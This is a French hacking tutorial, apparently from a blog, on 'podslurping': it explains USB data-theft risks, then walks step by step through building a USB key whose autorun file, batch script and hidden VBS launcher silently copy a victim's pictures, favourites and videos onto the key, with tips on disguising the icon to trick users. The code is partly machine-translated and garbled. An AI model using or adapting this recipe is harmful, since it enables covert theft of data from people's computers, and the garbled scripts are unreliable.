Comment copier (voler) des fichiers d'un ordinateur vers une clé USB

Comment copier (voler) des fichiers d'un ordinateur vers une clé USB

Risques et menaces associés au clés USB:

Vols d'informations - PodSlurping
Le contenu d'une clé USB peut être intégralement et silencieusement copié sur la machine hôte, à l'insu de son propriétaire, au moment où elle est branchée sur un poste qui s'avère hostile ou avec un utilisateur qui s'avère hostile. 


Le risque est donc que n'importe qui peut dérober avec une simplicité enfantine et en un instant le contenu de n'importe quelle clé sur n'importe quelle machine où elle est branchée. 

L'inverse est également vrai et le propriétaire d'une clé USB peut dans les mêmes conditions voler des données se trouvant sur une machine avec une désarmante facilité et en très peu de temps et très peu de manipulation, voir en automatisant totalement l'attaque.


Vols de la clé vers l'ordinateur :
Un processus tournant en arrière plan, dissimulé par un crochetage (hook) afin de ne pas apparaître dans la liste des processus, comme la plupart des codes malveillants actuels, peut très bien attendre qu'une clé soit branchée pour lancer la copie de son contenu. Un tel processus ne sera pas facilement détectable sur le poste hôte d'autant que, le plus souvent, le possesseur de la clé n'est généralement pas le possesseur de la machine hôte (machine chez un fournisseur, un client, un cybercafé, un "ami" etc. ...).

Certains outils voleurs permettent même de faire une image complète de la clé (toute la mémoire y compris celle sensée ne pas/plus contenir de données). Le vol s'étend alors non seulement aux documents présents mais aussi aux documents que vous croyez avoir effacés (sous Windows, l'effacement normal d'un document ne fait qu'altérer le premier caractère du nom de ce document dans la table des matières du volume - le contenu du document reste intact tant que la mémoire n'est pas ré-utilisée pour d'autres données). Ces outils permettent donc à l'attaquant de "récupérer" des documents que vous croyez effacés sur la clé USB parce que leurs noms ne s'affichent pas lors de l'exploration ordinaire de la clé avec l'explorateur de Windows.

Vol de l'ordinateur vers la clé :
Mettons de côté le cas de figure où le propriétaire de la clé peut s'asseoir devant l'ordinateur et y faire les manipulations qu'il souhaite (explorer les volumes de la machine et copier des fichiers vers sa clé). 

La clé peut contenir un amorçage automatique ("autorun" sous Windows) et, lorsqu'elle est branchée sur une machine un spyware peut être implanté silencieusement sur la machine et exécuter les fonctions pour lesquelles il a été programmé (vol des mots de passe, du carnet d'adresse, de documents spécifiques... mais aussi, c'est une autre histoire dans les failles de sécurité - et un port USB est une faille de sécurité sur certaines machines - accès au serveur d'un réseau d'entreprise pour y implanter une porte dérobée qui sera utilisée plus tard (backdoor) et autres attaques etc. ...). 

Ce type d'attaque est connu sous le nom de "podslurping" (en référence au produit iPod d'Apple). Elle s'effectue depuis le périphérique (pas uniquement les clés USB). Elle consiste à brancher, sur un système, un support de stockage quelconque (un lecteur MP3 peut faire l'affaire) afin de dérober furtivement l'information contenue sur le système. Par exemple, il suffit de prétendre que les batteries de son lecteur MP3 ou de son appareil photo-numérique sont déchargées et demander l'autorisation de se brancher quelques minutes sur un port USB (qui véhicule également des courants d'alimentation en plus des données) pour lancer silencieusement une copie d'une partie d'un disque dur vers ce périphérique amovible dont les capacités de stockage peuvent être très importante (jusqu'à plusieurs giga octets). 

Si le mot de "podslurping" est né vers les années 2005, l'idée et la pratique sont aussi vieilles que les disquettes, seules la capacité et la vitesse des supports ayant changé et rendant l'opération de plus en plus simple, rapide et portant sur des quantités de données de plus en plus grandes.

Voici comment  préparer un tel lecteur flash USB sinistre

ÉTAPE 1 
Ouvrez le Bloc-notes (je recommande Notepad ++) et copiez-collez les lignes suivantes

[autorun] 
icon = lecteur.ico 
open = launch.bat 
action = Cliquez sur OK pour exécuter 
shell \ open \ command = launch.bat 
Enregistrez-le en tant que autorun.inf

La ligne d'icône est facultative. Vous pouvez changer l'icône selon vos goûts ou la laisser à l'icône par défaut. C'est utile à des fins d'ingénierie sociale, comme inciter l'utilisateur à cliquer sur un fichier sur le disque en le faisant ressembler à un jeu ou quelque chose.

La commande "action =" est également facultative mais parfois, lorsque l'exécution automatique se lance, elle peut demander à l'utilisateur de s'ouvrir. En fonction de ce que vous mettez ici, l'utilisateur sera invité à cliquer sur OK ou à exécuter le fichier.
Ce code agit comme une sauvegarde juste au cas où l'on demande à l'utilisateur ce qu'il doit ouvrir. Ceci n'est pas nécessaire si vous utilisez l'ordinateur.


La commande "shell / open" sert également de sauvegarde au cas où l'utilisateur clique sur annuler au lieu d'ouvrir à l'invite. Ce code s'exécutera lorsque la lettre de lecteur est cliquée.

ÉTAPE 2 
Ouvrez à nouveau le bloc-notes et copiez-collez les lignes suivantes

@Écho off 
:: variables 
/ min 
SET odrive =% odrive: ~ 0,2% 
set backupcmd = xcopie / s / c / d / e / h / i / r / y 
Écho off 
% backupcmd% "% USERPROFILE% \ images" "% drive% \ all \ Mes photos" 
% backupcmd% "% USERPROFILE% \ Favoris" "% lecteur% \ all \ Favoris" 
% backupcmd% "% USERPROFILE% \ videos" "% lecteur% \ all \ vids" 
@Écho off 
cls 
Enregistrer comme fichier.bat

Ce fichier est configuré pour copier le contenu des dossiers d'images, de favoris et de vidéos des utilisateurs en cours vers le lecteur Flash sous un dossier appelé "all". C'est la section du code que vous devrez modifier en fonction de ce que vous voulez copier.

Le premier chemin de fichier "% USERPROFILE% \ pictures" - est la cible. 
Le deuxième chemin de fichier "% drive% \ all \ My pics" est la destination.

ÉTAPE 3 
Ouvrez à nouveau le Bloc-notes et copiez-collez la ligne suivante

CreateObject ("Wscript.Shell"). Exécutez "" "" & WScript.Arguments (0) & "" "", 0, Faux 
Enregistrer cela sous invisible.vbs

Ce code exécute le fichier file.bat en tant que processus afin qu'il n'affiche pas l'invite CMD et tout le traitement du fichier de commandes.

ÉTAPE 4 
Ouvrez le Bloc-notes une dernière fois et copiez-collez la ligne suivante

wscript.exe \ invisible.vbs file.bat 
Enregistrer ceci en tant que launch.bat

Ce fichier batch fait deux choses, il recherche le fichier invisible.vbs à la racine du lecteur Flash puis le charge avec file.bat afin que file.bat soit exécuté avec le code du fichier vbs.

ÉTAPE 5 
Copiez tous les 4 fichiers créés dans les étapes ci-dessus et placez-le à la racine du lecteur Flash, y compris le fichier d'icône si nécessaire. Créez également un dossier nommé "all" où le contenu doit être copié automatiquement. Vous pouvez appeler ce dossier par n'importe quel nom, mais vous devez ensuite refléter les modifications que vous avez apportées à l'étape 2.

C'est tout ce qui doit être fait pour voler des fichiers d'un ordinateur vers une clé USB.

Ne Manquez pas:


configurer une plate-forme de piratage de Raspberry Pi Headless en cours d'exécution Kali Linux 

Comment pirater les caméras privées CCTV



Commentaires

Popular Posts